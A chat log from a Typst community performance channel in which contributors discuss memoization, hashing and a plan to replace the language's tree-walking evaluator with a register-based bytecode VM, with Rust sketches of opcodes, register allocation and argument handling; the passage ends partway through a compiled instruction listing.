Performance | Typst | Page 3

left night Jan 15, 2024, 5:31 PM

#

If you're interested I can send it anyway

sturdy sequoia Jan 15, 2024, 5:32 PM

#

left night If you're interested I can send it anyway

I'd love to 😄

left night Jan 15, 2024, 5:34 PM

#

sturdy sequoia I'd love to 😄

As said, it's just a rough draft and the ideas are also far from final. I'm also not yet really 100% sold on the custom vtable thing, but it would definitely unlock some cool stuff.

📎 value-repr.md

tight glade Jan 15, 2024, 7:45 PM

#

Very nice read as well!

I'm wondering, is it always the best option to use span for memoization? or could we do that more subtly when needed for reasons?

I mean, what other information do we have access to at that stage? 🤔

glossy shore Jan 16, 2024, 6:42 AM

#

Wouldn't `Arc<(Hash, RestOfData)>` already store the hash alongside the refcounts?

#

Call me foolish, but It's All Just One Instruction Anyway™, no?

left night Jan 16, 2024, 9:05 AM

#

glossy shore Wouldn't `Arc<(Hash, RestOfData)>` already store the hash alongside the refcount...

Yeah, right. I was thinking of the other possible optimization where the header is in front of the pointer.
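
For reference, the `Arc<(Hash, RestOfData)>` idea could look roughly like the sketch below. `HashedArc` and its methods are hypothetical names for illustration, not something from Typst or comemo, and the hash here is a plain `u64` from the standard library's `DefaultHasher`.

```rust
use std::collections::hash_map::DefaultHasher;
use std::hash::{Hash, Hasher};
use std::sync::Arc;

/// Hypothetical wrapper: the hash is computed once at construction and lives
/// in the same heap allocation as the payload (next to the Arc's refcounts).
pub struct HashedArc<T> {
    inner: Arc<(u64, T)>,
}

impl<T: Hash> HashedArc<T> {
    /// Hashes `value` once and stores the result alongside it.
    pub fn new(value: T) -> Self {
        let mut hasher = DefaultHasher::new();
        value.hash(&mut hasher);
        Self { inner: Arc::new((hasher.finish(), value)) }
    }
}

impl<T> HashedArc<T> {
    /// Returns the cached hash without re-hashing the payload.
    pub fn cached_hash(&self) -> u64 {
        self.inner.0
    }

    /// Borrows the payload.
    pub fn get(&self) -> &T {
        &self.inner.1
    }
}

impl<T> Clone for HashedArc<T> {
    /// Cloning only bumps the refcount; the hash is shared, not recomputed.
    fn clone(&self) -> Self {
        Self { inner: Arc::clone(&self.inner) }
    }
}
```

Reading the hash is then one pointer dereference plus a load, whichever side of the pointer the header sits on.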

left night Jan 16, 2024, 9:06 AM

#

glossy shore Call me foolish, but It's All Just One Instruction Anyway™, no?

Perhaps, it doesn't make a real difference.

sturdy sequoia Jan 17, 2024, 4:50 PM

#

@left night I kinda want to work on the whole "bytecode" thing, would you be open to that?

left night Jan 17, 2024, 4:56 PM

#

sturdy sequoia @left night I kinda want to work on the whole "bytecode" thing, would ...

I am definitely open to that. I also think that it would be a fun greenfield project with lots of stuff to experiment with.

sturdy sequoia Jan 17, 2024, 4:57 PM

#

left night I am definitely open to that. I also think that it would be a fun greenfield pro...

greenfield?

#

I don't know what that means 💀

left night Jan 17, 2024, 4:57 PM

#

sturdy sequoia greenfield?

https://en.wikipedia.org/wiki/Greenfield_project

#

it's obviously not completely free from existing constraints, but it involves building lots of new free-standing stuff

sturdy sequoia Jan 17, 2024, 5:01 PM

#

Yes, I think I'll start with a fairly basic system that doesn't do any kind of smart checking (like validating args beforehand) to try and make it simpler, then grow the complexity (and performance) as I go along

untold turret Jan 17, 2024, 5:14 PM

#

sturdy sequoia @left night I kinda want to work on the whole "bytecode" thing, would ...

what is the bytecode in typst?

sturdy sequoia Jan 17, 2024, 5:15 PM

#

untold turret what is the bytecode in typst?

it would replace `eval` with a new pre-compiled bytecode that would hopefully be much faster to evaluate as well as be more memoizable (by not having any spans and things like that)

untold turret Jan 17, 2024, 5:16 PM

#

So there is no bytecode in typst, and you want to make one.

sturdy sequoia Jan 17, 2024, 5:17 PM

#

yes

lunar kettle Jan 17, 2024, 5:18 PM

#

sturdy sequoia it would replace `eval` with a new pre-compiled bytecode that would hopefully be...

so would this only apply to code that is evaluated with `eval`, or to all Typst code?

sturdy sequoia Jan 17, 2024, 5:19 PM

#

lunar kettle so this would only apply to any code that is evaluated with `eval` or all Typst ...

all typst code

#

eval in this case refers to the module inside of the typst source 😄

untold turret Jan 17, 2024, 5:24 PM

#

I was looking at the parallel test branch, but it hasn't been merged yet. https://github.com/typst/typst/commit/e0adfc1ded3dedde5f450eb1f0d0dd3cb37cd768
Some tests fail, but I don't know what those failures mean. Could they be fixed with some simple patches? What is missing that causes the failures? I have no idea.

sturdy sequoia Jan 17, 2024, 5:24 PM

#

untold turret I was looking at the parallel test branch, but it is not get merged. https://git...

There is some stuff regarding introspection that just doesn't work yet on that branch 😦

#

@left night do you know where values are collected? Like joined into one big value for returning 🤨

#

Ah, I found it sorry for the ping

lunar kettle Jan 17, 2024, 5:35 PM

#

sturdy sequoia all typst code

So if my understanding is correct, currently typst code is interpreted by basically walking through the tree, and you want to do something like in Python, where it's first compiled to bytecode and then the bytecode gets run instead?

sturdy sequoia Jan 17, 2024, 5:35 PM

#

lunar kettle So my understanding is correctly, currently typst code is interpreted by walking...

yes, because as it turns out, eval is rather slow and happens very often

lunar kettle Jan 17, 2024, 5:36 PM

#

I seee

sturdy sequoia Jan 17, 2024, 5:36 PM

#

The goal being to make eval blazing fast 🚀 and easier to understand (hopefully)

lunar kettle Jan 17, 2024, 5:36 PM

#

Sounds like a huge undertaking tho haha

sturdy sequoia Jan 17, 2024, 5:36 PM

#

Actually: not that much 😄

lunar kettle Jan 17, 2024, 5:36 PM

#

Would you generate your own bytecode language or are there libraries for that

#

Or how exactly

sturdy sequoia Jan 17, 2024, 5:36 PM

#

Because I just need to traverse the tree and generate OpCodes instead

#

And then eval the opcodes which is fairly simple
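
A toy version of "traverse the tree, emit opcodes, then eval the opcodes" might look like the sketch below. `Expr` and `OpCode` are made-up stand-ins for illustration (the real syntax tree and instruction set are much richer); this is the stack-based flavour.

```rust
/// Hypothetical expression tree, standing in for the real syntax tree.
pub enum Expr {
    Int(i64),
    Add(Box<Expr>, Box<Expr>),
    Mul(Box<Expr>, Box<Expr>),
}

/// Hypothetical stack-machine opcodes.
#[derive(Debug, Clone, Copy, PartialEq)]
pub enum OpCode {
    Push(i64),
    Add,
    Mul,
}

/// Post-order traversal: emit both operands first, then the operator.
pub fn compile(expr: &Expr, out: &mut Vec<OpCode>) {
    match expr {
        Expr::Int(n) => out.push(OpCode::Push(*n)),
        Expr::Add(lhs, rhs) => {
            compile(lhs, out);
            compile(rhs, out);
            out.push(OpCode::Add);
        }
        Expr::Mul(lhs, rhs) => {
            compile(lhs, out);
            compile(rhs, out);
            out.push(OpCode::Mul);
        }
    }
}

/// Evaluates the opcodes on a value stack.
/// Returns `None` if the code pops from an empty stack.
pub fn run(code: &[OpCode]) -> Option<i64> {
    let mut stack = Vec::new();
    for op in code {
        match *op {
            OpCode::Push(n) => stack.push(n),
            OpCode::Add => {
                let rhs = stack.pop()?;
                let lhs = stack.pop()?;
                stack.push(lhs + rhs);
            }
            OpCode::Mul => {
                let rhs = stack.pop()?;
                let lhs = stack.pop()?;
                stack.push(lhs * rhs);
            }
        }
    }
    stack.pop()
}
```

The eval loop no longer touches the tree at all, which is where the hoped-for speedup would come from.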

lunar kettle Jan 17, 2024, 5:37 PM

#

Icic

sturdy sequoia Jan 17, 2024, 5:37 PM

#

At present it can already do basic operations

lunar kettle Jan 17, 2024, 5:37 PM

#

Well keep us posted 💪

sturdy sequoia Jan 17, 2024, 5:37 PM

#

mind you I am not compiling to bytecode yet

#

My goal is eventually to add (primitive) type checking in it (once we have type validation) and check whether variables, functions, etc. exist

left night Jan 17, 2024, 5:39 PM

#

untold turret I was looking at the parallel test branch, but it is not get merged. https://git...

Parallel layout requires a change to how locations are assigned, which breaks measurement. More details and a possible solution in my recent blog post: https://laurmaedje.github.io/posts/frozen-state/

sturdy sequoia Jan 17, 2024, 5:39 PM

#

Later on we might even be able to optimize the bytecode during eval, but that's wayyyyyy out of scope for my early prototype

left night Jan 17, 2024, 5:40 PM

#

@sturdy sequoia This is more fun than dealing with subtle bugs in the styling system, eh? 😄

sturdy sequoia Jan 17, 2024, 5:41 PM

#

left night @sturdy sequoia This is more fun than dealing with subtle bugs in the styl...

yes 😄

#

The thing is that I don't understand all of the complexity of the styling system so I feel a bit dumb lmao

cunning wadi Jan 17, 2024, 5:42 PM

#

it might be a good idea to do a register based interpreter instead, while you are already rewriting the interpreter

#

that should increase the performance over a stack based vm

sturdy sequoia Jan 17, 2024, 5:43 PM

#

cunning wadi it might be a good idea to do a register based interpreter instead, while you ar...

I must admit I am doing it stack based because it's easier and makes joining output easy: I just join the stack once I'm done 😂

#

#

That's literally how I'm handling producing the output and joining of values

#

and it's dead easy

#

I'll probably remove the Variable stack value mind you

cunning wadi Jan 17, 2024, 5:47 PM

#

I guess for joining with a register based vm, we would simply need a join instruction: `JOIN accumulator, return_register`

sturdy sequoia Jan 17, 2024, 5:47 PM

#

cunning wadi I guess for joining with a register based vm, we would simply need a join instru...

yes probably

#

how would you handle named and spread arguments tho?

#

My idea currently is that calling a function looks like this: `Call(function_id, arg_count)` and then I pop `arg_count` arguments and if they are `NamedArgument` or `SpreadArgument` I apply the proper behaviour

#

would you essentially do the same?
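
To make the `Call(function_id, arg_count)` idea concrete, here is a rough sketch of the "pop `arg_count` values and sort them out" step. `StackValue`, `Args` and `collect_args` are hypothetical names, and values are plain `i64`s to keep it short.

```rust
use std::collections::BTreeMap;

/// Hypothetical stack values: plain, named, or spread arguments.
#[derive(Debug, Clone, PartialEq)]
pub enum StackValue {
    Int(i64),
    Named(String, i64),
    Spread(Vec<i64>),
}

/// The arguments handed to the callee.
#[derive(Debug, Default, PartialEq)]
pub struct Args {
    pub positional: Vec<i64>,
    pub named: BTreeMap<String, i64>,
}

/// Pops the top `arg_count` values (keeping call order) and sorts them into
/// positional and named arguments. Returns `None` on stack underflow.
pub fn collect_args(stack: &mut Vec<StackValue>, arg_count: usize) -> Option<Args> {
    if stack.len() < arg_count {
        return None;
    }
    let start = stack.len() - arg_count;
    let mut args = Args::default();
    for value in stack.drain(start..) {
        match value {
            StackValue::Int(n) => args.positional.push(n),
            StackValue::Named(name, n) => {
                args.named.insert(name, n);
            }
            // A spread argument contributes all of its items positionally.
            StackValue::Spread(items) => args.positional.extend(items),
        }
    }
    Some(args)
}
```

All of the sorting happens at run time on every call here, which is the cost that comes up later in the discussion.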

#

I'm just not sure I want to deal with the complexity of register based VM 😐

#

because (I think) it'll make the compilation much harder

cunning wadi Jan 17, 2024, 5:49 PM

#

#

here's how lua 5 does it

#

(https://www.lua.org/doc/jucs05.pdf)

sturdy sequoia Jan 17, 2024, 5:49 PM

#

cunning wadi (https://www.lua.org/doc/jucs05.pdf)

great resource, thanks!

#

Hmmm, I see how that leads to a smaller eval indeed

#

It also has the advantage that we don't need to allocate like ever

tight glade Jan 17, 2024, 8:45 PM

#

sturdy sequoia Actually: not that much 😄

Famous last words 😂

sturdy sequoia Jan 17, 2024, 8:45 PM

#

tight glade Famous last words 😂

I said the same thing for gradients didn’t I?

#

angryeyes

tight glade Jan 17, 2024, 8:47 PM

#

You did xD

glossy shore Jan 18, 2024, 9:50 AM

#

sturdy sequoia My idea currently is that calling a function looks like this: `Call(function_id,...

How are you hoping to achieve the big fast with such high-level abstractions

#

We need function signatures to simply not exist at evaltime

#

Oh god that means we will have two entirely distinct compilation passes
terminology is gonna aa

hoary dew Jan 18, 2024, 9:55 AM

#

sturdy sequoia At present it can already do basic operations

What font are you using?

sturdy sequoia Jan 18, 2024, 9:56 AM

#

hoary dew What font are you using?

comic code

sturdy sequoia Jan 18, 2024, 9:57 AM

#

glossy shore Oh god that means we will have two entirely distinct compilation passes terminol...

Yes, function calls would still be a bit slow, but better than the current technique

#

I am now looking into the register-based system that @cunning wadi suggested and I wonder if I can use that to make it faster

#

But obviously, I will need to do a lot of testing and benchmarking to make it work

glossy shore Jan 18, 2024, 10:02 AM

#

sturdy sequoia I am now looking into the register-based system that @cunning wadi sugge...

It can really be reduced to

- resolve all arguments against the function's signature
- compile down to 1 register per argument according to the function's signature, not the call site
- give function access to those registers

sly pecan Jan 18, 2024, 11:16 AM

#

sturdy sequoia comic code

master race

sturdy sequoia Jan 18, 2024, 11:19 AM

#

glossy shore It can really be reduced to - resolve all arguments against the function's signa...

yes but the problem is named and optional arguments

#

it's a bit tricky for those

glossy shore Jan 18, 2024, 11:19 AM

#

mmnope

#

- named: not any different, just have some canonical ordering
- optional: optional is a call site privilege, simply substitute the value in the bytecode

#

though dynamic dispatch is harder.
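
A sketch of what "resolve against the signature, one slot per parameter" could mean when the callee is statically known. `Param`, `CallArg` and `resolve` are hypothetical, and the slots hold plain `i64`s where a real compiler would hold registers or constants. Named arguments land in the signature's canonical order and missing optional ones get their default substituted at compile time.

```rust
/// Hypothetical parameter description: a name and an optional default.
#[derive(Debug, Clone, PartialEq)]
pub struct Param {
    pub name: &'static str,
    pub default: Option<i64>,
}

/// Hypothetical call-site argument.
pub enum CallArg {
    Positional(i64),
    Named(&'static str, i64),
}

/// Produces exactly one slot per parameter, in signature order.
pub fn resolve(signature: &[Param], call: &[CallArg]) -> Result<Vec<i64>, String> {
    let mut slots: Vec<Option<i64>> = vec![None; signature.len()];
    let mut next_positional = 0;
    for arg in call {
        let (index, value) = match arg {
            CallArg::Positional(value) => {
                let index = next_positional;
                next_positional += 1;
                (index, *value)
            }
            CallArg::Named(name, value) => {
                let index = signature
                    .iter()
                    .position(|param| param.name == *name)
                    .ok_or_else(|| format!("unknown argument: {name}"))?;
                (index, *value)
            }
        };
        let slot = slots
            .get_mut(index)
            .ok_or_else(|| "too many positional arguments".to_string())?;
        if slot.is_some() {
            return Err(format!("duplicate argument: {}", signature[index].name));
        }
        *slot = Some(value);
    }
    // Substitute defaults for anything the call site left out.
    slots
        .into_iter()
        .zip(signature)
        .map(|(slot, param)| {
            slot.or(param.default)
                .ok_or_else(|| format!("missing argument: {}", param.name))
        })
        .collect()
}
```

This only works when the callee's signature is known while compiling the call, which is why dynamic dispatch is the harder case.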

sturdy sequoia Jan 18, 2024, 12:59 PM

#

@glossy shore my current design is as follows:

- The compiler builds a list of instructions (each of which has a span in a second array)
- The compiler also builds a list of constants (to avoid cloning and keep instructions `Copy`)
- And a list of jump labels
- Then an `Executor` is created which is very lightweight, containing a fixed-size array of registers (initially all `Value::None`)
- It executes each instruction one-by-one, borrowing as much as possible (to avoid cloning)
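
A minimal sketch of that design, under heavy simplifying assumptions: the instruction set here is invented (`Set`, `Add`, `JumpIfZero`, `Jump`), values are just `None` or integers, the span array is left out, and constants are cloned into registers instead of borrowed.

```rust
pub const REGISTER_COUNT: usize = 8;

#[derive(Debug, Clone, PartialEq)]
pub enum Value {
    None,
    Int(i64),
}

/// Instructions only hold small indices, so they can be `Copy`.
#[derive(Debug, Clone, Copy, PartialEq)]
pub enum Instruction {
    /// registers[register] = constants[constant]
    Set { register: u8, constant: u16 },
    /// registers[target] = registers[lhs] + registers[rhs]
    Add { lhs: u8, rhs: u8, target: u8 },
    /// Jump to labels[label] if registers[cond] is the integer zero.
    JumpIfZero { cond: u8, label: u16 },
    /// Unconditional jump to labels[label].
    Jump { label: u16 },
}

pub struct Program {
    pub instructions: Vec<Instruction>,
    pub constants: Vec<Value>,
    /// Each label is an index into `instructions`.
    pub labels: Vec<usize>,
}

pub struct Executor<'a> {
    program: &'a Program,
    registers: [Value; REGISTER_COUNT],
}

impl<'a> Executor<'a> {
    /// All registers start out as `Value::None`.
    pub fn new(program: &'a Program) -> Self {
        Self { program, registers: std::array::from_fn(|_| Value::None) }
    }

    /// Runs until the program counter leaves the instruction list.
    /// Panics on out-of-range register, constant, or label indices.
    pub fn run(mut self) -> [Value; REGISTER_COUNT] {
        let program = self.program;
        let mut pc = 0;
        while let Some(instruction) = program.instructions.get(pc) {
            pc += 1;
            match *instruction {
                Instruction::Set { register, constant } => {
                    self.registers[register as usize] =
                        program.constants[constant as usize].clone();
                }
                Instruction::Add { lhs, rhs, target } => {
                    let sum = match (&self.registers[lhs as usize], &self.registers[rhs as usize]) {
                        (Value::Int(a), Value::Int(b)) => Value::Int(a + b),
                        _ => Value::None,
                    };
                    self.registers[target as usize] = sum;
                }
                Instruction::JumpIfZero { cond, label } => {
                    if self.registers[cond as usize] == Value::Int(0) {
                        pc = program.labels[label as usize];
                    }
                }
                Instruction::Jump { label } => pc = program.labels[label as usize],
            }
        }
        self.registers
    }
}
```

Keeping jump targets in a separate label table means instructions never hold raw addresses, so the compiler can patch or reorder code by touching only the table.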

#

My instruction set is around 23 instructions so far

#

I'm definitely missing some, for example you cannot build a dict or array at the moment, but I'll add that

#

Cannot do show-set rules either

#

But I'll work on that now

onyx furnace Jan 18, 2024, 1:02 PM

#

bytecode will be the road to jit🤩

sturdy sequoia Jan 18, 2024, 1:03 PM

#

Each instruction is only 8 bytes which imo is perfectly fine
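
The actual layout isn't shown here, but as an illustration of how an instruction can come out at exactly 8 bytes: a 16-bit tag plus up to three 16-bit operands. The variants and field widths below are assumptions, not the real instruction set.

```rust
use std::mem::size_of;

/// Hypothetical instruction layout: `repr(u16)` gives a 16-bit tag followed
/// by the fields of the active variant, so the largest variant (`Join`)
/// takes 2 + 3 * 2 = 8 bytes.
#[repr(u16)]
#[derive(Debug, Clone, Copy, PartialEq)]
pub enum Instruction {
    Set { register: u16, constant: u16 },
    Join { lhs: u16, rhs: u16, target: u16 },
    Jump { label: u16 },
}

/// Size of one instruction in bytes.
pub const INSTRUCTION_SIZE: usize = size_of::<Instruction>();
```

Widening any operand to 32 bits, or embedding a value instead of an index into a constant table, would push the size up quickly.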

sturdy sequoia Jan 18, 2024, 1:04 PM

#

onyx furnace bytecode will be the road to jit🤩

yesssss

onyx furnace Jan 18, 2024, 1:05 PM

#

sturdy sequoia Cannot do show-set rules either

yes. i also worry about that. jit/bytecode the "pure-compute" part is much easier

sturdy sequoia Jan 18, 2024, 1:05 PM

#

I still think that for now I'll handle arguments and variables as special values that are accessed with an ID

sturdy sequoia Jan 18, 2024, 1:07 PM

#

onyx furnace yes. i also worry about that. jit/bytecode the "pure-compute" part is much easie...

my goal is to turn them into instructions that are similar to function calls but have specific semantics

#

we'll see how that ends up working!

#

the hardest part will be building the compiler itself I think

untold turret Jan 18, 2024, 1:44 PM

#

Would this also make browser-side layout computing possible? If we can ship the bytecode, we could lay out and produce frames by executing the bytecode dynamically in the browser, without having to download the entire 17mb compiler.wasm to the client.

#

If the bytecode could be lowered to wasm, we can even use browser native wasm interpreter.

left night Jan 18, 2024, 1:47 PM

#

To lower the bytecode to wasm, it would need to operate on a very low-level basis. I think the planned implementation would continue using all of Typst's data structure and runtime infrastructure, meaning that layout is separate from it.

sturdy sequoia Jan 18, 2024, 1:50 PM

#

left night To lower the bytecode to wasm, it would need to operate on a very low-level basi...

yes indeed, my goal is to make it easy-ish to turn set show labels, etc. into function calls but JIT is still wayy out of scope

untold turret Jan 18, 2024, 1:50 PM

#

left night To lower the bytecode to wasm, it would need to operate on a very low-level basi...

We don't have to convert to wasm in the early stage.

sturdy sequoia Jan 18, 2024, 1:50 PM

#

My goal is a nice performance bump for now

sturdy sequoia Jan 18, 2024, 2:21 PM

#

Do you think it's a good idea to do the following:

- Recursive descent in the tree: each node gets compiled to an instruction, but uses a register number that keeps increasing every time we need one
- Do a second pass once we have collected all of the instructions, deduplicating them: essentially once a register is no longer used, mark it as "free" and give the next instruction that needs a register access to it

#

That's essentially a first recursive pass, followed by a second linear pass
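
The second, linear pass could be sketched like this. `Instr` and `remap_registers` are hypothetical, and the sketch only handles straight-line code: with jumps or loops, "last use" would need a proper liveness analysis.

```rust
use std::collections::HashMap;

/// Hypothetical instruction shape: some registers read, at most one written.
#[derive(Debug, Clone, PartialEq)]
pub struct Instr {
    pub reads: Vec<usize>,
    pub write: Option<usize>,
}

struct Allocator {
    mapping: HashMap<usize, usize>,
    free: Vec<usize>,
    count: usize,
}

impl Allocator {
    /// Physical register for a virtual one, allocating on first sight.
    fn get(&mut self, virtual_reg: usize) -> usize {
        if let Some(&physical) = self.mapping.get(&virtual_reg) {
            return physical;
        }
        let physical = match self.free.pop() {
            Some(reg) => reg,
            None => {
                self.count += 1;
                self.count - 1
            }
        };
        self.mapping.insert(virtual_reg, physical);
        physical
    }

    /// Marks the physical register behind `virtual_reg` as free again.
    fn release(&mut self, virtual_reg: usize) {
        if let Some(physical) = self.mapping.remove(&virtual_reg) {
            self.free.push(physical);
        }
    }
}

/// Rewrites ever-increasing virtual registers to a small reused set.
/// Returns the rewritten code and the number of physical registers needed.
pub fn remap_registers(code: &[Instr]) -> (Vec<Instr>, usize) {
    // Index of the last instruction that touches each virtual register.
    let mut last_use: HashMap<usize, usize> = HashMap::new();
    for (index, instr) in code.iter().enumerate() {
        for &reg in instr.reads.iter().chain(instr.write.iter()) {
            last_use.insert(reg, index);
        }
    }

    let mut alloc = Allocator { mapping: HashMap::new(), free: Vec::new(), count: 0 };
    let mut out = Vec::with_capacity(code.len());
    for (index, instr) in code.iter().enumerate() {
        let reads: Vec<usize> = instr.reads.iter().map(|&reg| alloc.get(reg)).collect();
        // Operands that die here are freed first, so the target may reuse them.
        for &reg in &instr.reads {
            if last_use[&reg] == index {
                alloc.release(reg);
            }
        }
        let write = instr.write.map(|reg| alloc.get(reg));
        // A value that is never read afterwards is dead immediately.
        if let Some(reg) = instr.write {
            if last_use[&reg] == index {
                alloc.release(reg);
            }
        }
        out.push(Instr { reads, write });
    }
    (out, alloc.count)
}
```

For something like `(a + b) + c`, the first pass would hand out five registers and this pass brings it down to two.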

#

note that currently locals are stored in a special local store and not in registers, same with arguments. Therefore only values that are not bound are ever stored in registers

sturdy sequoia Jan 18, 2024, 4:09 PM

#

@left night do assignments return a value in typst?

glad urchin Jan 18, 2024, 4:09 PM

#

i believe they return None

sturdy sequoia Jan 18, 2024, 4:09 PM

#

Yes, so in my case they won't return anything

glad urchin Jan 18, 2024, 4:10 PM

#

wdym?

sturdy sequoia Jan 18, 2024, 4:10 PM

#

well in my case, an assignment is just a single instruction

#

it won't store anything in any register

#

because where it's used will automatically and always be a none

glad urchin Jan 18, 2024, 4:10 PM

#

yea but what if the function only has an assignment?

sturdy sequoia Jan 18, 2024, 4:11 PM

#

glad urchin yea but what if the function only has an assignment?

it will apply it and return None automatically

glad urchin Jan 18, 2024, 4:11 PM

#

and what if the assignment is used in an expression?

sturdy sequoia Jan 18, 2024, 4:11 PM

#

glad urchin and what if the assignment is used in an expression?

it'll be None automatically

glad urchin Jan 18, 2024, 4:11 PM

#

well

#

then it does return something in the end

#

:p

sturdy sequoia Jan 18, 2024, 4:12 PM

#

well no, the operator doesn't, it will just get automatically set to a None

#

Basically, register 0 is always a None

#

That way

glad urchin Jan 18, 2024, 4:12 PM

#

well, if you ensure it behaves exactly as it does now, then i dont see a problem

sturdy sequoia Jan 18, 2024, 4:12 PM

#

`Join 0 1 1` is easy to detect

#

My goal is to be able to remove useless assignments 😂

#

And useless ops that use a none
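
A sketch of that kind of cleanup pass, assuming register 0 always holds none, is never written, and joining with none leaves the other value unchanged. The `Copy` instruction and `simplify` are made up for the example.

```rust
/// Register that is assumed to always hold none.
pub const NONE_REGISTER: u8 = 0;

#[derive(Debug, Clone, Copy, PartialEq)]
pub enum Instruction {
    Set { register: u8, constant: u16 },
    Join { lhs: u8, rhs: u8, target: u8 },
    /// Hypothetical plain move, used when a join with none is not a no-op.
    Copy { source: u8, target: u8 },
}

/// Drops joins that cannot change anything and turns the remaining
/// joins-with-none into plain copies.
pub fn simplify(code: &[Instruction]) -> Vec<Instruction> {
    code.iter()
        .filter_map(|&instruction| match instruction {
            Instruction::Join { lhs, rhs, target }
                if lhs == NONE_REGISTER || rhs == NONE_REGISTER =>
            {
                let other = if lhs == NONE_REGISTER { rhs } else { lhs };
                if other == target {
                    // e.g. `Join 0 1 1`: register 1 joined with none stays as is.
                    None
                } else {
                    Some(Instruction::Copy { source: other, target })
                }
            }
            instruction => Some(instruction),
        })
        .collect()
}
```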

glossy shore Jan 19, 2024, 1:42 PM

#

sturdy sequoia Each instruction is only 8 bytes which imo is perfectly fine

Not to criticise your work, but if CPUs can work with 4bytes max isn't that a lot?

glossy shore Jan 19, 2024, 1:42 PM

#

sturdy sequoia well no, the operator doesn't, it will just get automatically set to a None

That can just be the case whenever you can predict the value of an expression beforehand

sturdy sequoia Jan 19, 2024, 3:18 PM

#

Register re-mapping is implemented

#

😎

#

now I just need to finish implementing the VM

#

and it should work?

lunar kettle Jan 19, 2024, 4:21 PM

#

how long do you think itll take? 👀

sturdy sequoia Jan 19, 2024, 4:26 PM

#

lunar kettle how long do you think itll take? 👀

I honestly think it'll be faster than one might expect

#

I ended up being able to re-use a lot of the existing infrastructure so it's not too bad

#

What I mostly need to do is implement the VM, and optimize everything with IDs (which is already mostly the case, I just need to do it for scopes)

#

The one big thing missing right now is that you can't do any kind of scopes, there is only one scope: the global scope

#

However once I'm done, it'll be okay I think

lunar kettle Jan 19, 2024, 4:31 PM

#

keep us posted! :D

#

looking forward to seeing how much speed it ends up gaining

sturdy sequoia Jan 19, 2024, 4:32 PM

#

lunar kettle looking forward to seeing how much speed it ends up gaining

I'm afraid it'll be zero lol

#

One of the big changes mind you is also that I'm turning it from a clone fest to a borrow fest

#

which should help reduce cloning a TON

#

And it should be able to memoize compilation much more aggressively

lunar kettle Jan 19, 2024, 5:32 PM

#

sturdy sequoia I'm afraid it'll be zero lol

How so? :(

sturdy sequoia Jan 19, 2024, 5:35 PM

#

lunar kettle How so? :(

I meant I am scared that it might be no gains

#

I don't know yet

#

I'm kind of stuck on closures 💀

lunar kettle Jan 19, 2024, 5:35 PM

#

Maybe it’ll be worse 😂

sturdy sequoia Jan 19, 2024, 5:35 PM

#

lunar kettle Maybe it’ll be worse 😂

https://tenor.com/view/south-park-dude-gif-23750946

#

Now that's just mean 😂

#

The main advantage is that it should cache much better, need fewer instructions, etc.

lunar kettle Jan 19, 2024, 5:36 PM

#

https://tenor.com/view/dogs-graph-gif-11019563

#

Like that

#

Nah I’m joking

#

I’m sure it’ll be worth it 💪

sturdy sequoia Jan 19, 2024, 5:37 PM

#

I hope so too

#

it's a lot of work 💀

#

and it's nowhere near merge-quality code yet

tight glade Jan 19, 2024, 5:41 PM

#

You know I'd love to review, help, and document, right?

tight glade Jan 19, 2024, 5:41 PM

#

lunar kettle https://tenor.com/view/dogs-graph-gif-11019563

Best meme of the year

sturdy sequoia Jan 19, 2024, 5:49 PM

#

pub struct CompiledClosure {
    /// The span of the closure.
    span: Span,
    /// The instructions that make up the closure.
    instructions: Vec<Instruction>,
    /// The spans of the instructions.
    spans: Vec<Span>,
    /// The captured variables.
    captures: Vec<Capture>,
    /// The default values of the named parameters.
    /// To be loaded into the closure's scope.
    defaults: Vec<Register>,
    /// The number of local variables.
    locals: usize,
    /// The constants of the closure.
    constants: Vec<Value>,
    /// The strings of the closure.
    strings: Vec<String>,
    /// The patterns of the closure.
    patterns: Vec<Pattern>,
    /// The closures of the closure.
    closures: Vec<CompiledClosure>,
}

#

Now that's freaking fat

sly pecan Jan 19, 2024, 5:52 PM

#

Thicc

sturdy sequoia Jan 19, 2024, 7:39 PM

#

About half of the instructions are implemented

feral imp Jan 19, 2024, 7:47 PM

#

If you improve the performance of the typst language, will that improve the performance of the compilation of documents?

sturdy sequoia Jan 19, 2024, 7:49 PM

#

feral imp If you improve the performance of the typst language, will that improve the perf...

massively yes

tight glade Jan 19, 2024, 8:32 PM

#

Is eval a big bottleneck?

onyx furnace Jan 19, 2024, 8:43 PM

#

not really. for oi-wiki, most of the eval time is spent in the wasm plugin (generating qrcodes), and eval takes about 20%-30%

#

for smaller docs things may become different

#

also might be different for docs which make heavy use of scripting

#

but bytecode and jit are very very cool. i really want to see what it looks like

onyx furnace Jan 19, 2024, 8:47 PM

#

onyx furnace also might be different for docs which make heavy use of scripting

like tablex or cetz? maybe in these docs, eval takes a lot of time

sturdy sequoia Jan 19, 2024, 8:59 PM

#

tight glade Is eval a big bottleneck?

I think a more nuanced answer than @onyx furnace's is:

#

it depends

#

If you use libraries like tablex or codly, have complex templates, or do any sort of compute? yes

#

oi-wiki is really special because it's bottlenecked by the wasmi runtime

#

but most docs I have seen (so far) did have quite a bit of compute and decreasing our reliance on this will definitely help

#

Will it 10x typst's perfs? no

#

Will it 2x them? maybe, depends on the document

sly pecan Jan 19, 2024, 9:01 PM

#

sturdy sequoia Will it 10x typst's perfs? no

Is anything that doesn't 10x performance even worth doing?

sturdy sequoia Jan 19, 2024, 9:01 PM

#

sly pecan Is anything that doesn't 10x performance even worth doing?

Clearly not 😐

sly pecan Jan 19, 2024, 9:02 PM

#

sturdy sequoia Clearly not 😐

Handwritten assembly or riot

sturdy sequoia Jan 19, 2024, 9:02 PM

#

sly pecan Handwritten assembly or riot

... it kind of is 😎

sturdy sequoia Jan 19, 2024, 9:03 PM

#

sly pecan Handwritten assembly or riot

it's indeed a hand-written assembly 😄

#

(well a decent chunk was written by ChatGPT 😂)

sly pecan Jan 19, 2024, 9:06 PM

#

sturdy sequoia it's indeed a hand-written assembly 😄

Inline assembly in rust?

sturdy sequoia Jan 19, 2024, 9:07 PM

#

sly pecan Inline assembly in rust?

no, but it's an assembly

#

and I wrote it by hand

#

so it's hand written assembly

tight glade Jan 19, 2024, 10:09 PM

#

Thanks yous for your answers!

sturdy sequoia Jan 20, 2024, 12:22 PM

#

Ok, so the compiler mostly works. The following code:

= Hello, world!
This is a more complex example.

#lorem(300)

Gets compiled to the following instructions:

consts: [ Space, Text("Hello, World!"), Text("This is a more complex example."), Parbreak, 300]
isrs: [
  Set { register: Register(1), value: ConstId(0) },
  Join { lhs: Register(0), rhs: Register(1), target: Register(0) },
  Set { register: Register(2), value: ConstId(1) },
  Join { lhs: Register(3), rhs: Register(2), target: Register(3) },
  Heading { span: Span(1), level: 1, body: Register(3), target: Register(4) },
